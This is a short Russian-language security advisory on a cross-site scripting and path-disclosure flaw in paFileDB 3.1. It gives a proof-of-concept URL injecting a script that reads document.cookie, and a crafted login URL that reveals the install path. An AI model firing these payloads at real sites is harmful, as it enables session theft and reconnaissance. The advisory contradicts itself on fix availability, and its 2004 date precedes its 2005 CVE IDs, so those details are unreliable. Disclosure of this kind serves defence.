Межсайтовый скриптинг в paFileDB

Дата публикации:29.04.2004
Всего просмотров:1079
Опасность:
Средняя
Наличие исправления: Да
Количество уязвимостей:1
CVE ID: CVE-2005-0326
CVE-2005-0327
CVE-2005-1999
CVE-2005-2000
CVE-2005-2001
Вектор эксплуатации: Удаленная
Воздействие: Межсайтовый скриптинг
Раскрытие важных данных
Неавторизованное изменение данных
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: paFileDB 3.x
Уязвимые версии: paFileDB 3.1

Описание: Уязвимость в проверке правильности входных данных обнаружена в paFileDB. Удаленный пользователь может выполнить XSS нападение и определить инсталляционный путь.

1. XSS:

http://localhost/pafiledb.php?action=category&id='<script>alert(document.cookie);</script>
2. Раскрытие пути:
http://site/includes/admin/login.php?formname=DarkBicho& formpass=DarkBicho
&B1=%3E%3E+Log+In+%3C%3C&action=admin&login=do

URL производителя: http://www.phparena.net/

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: Multiple vulnerabilities paFileDB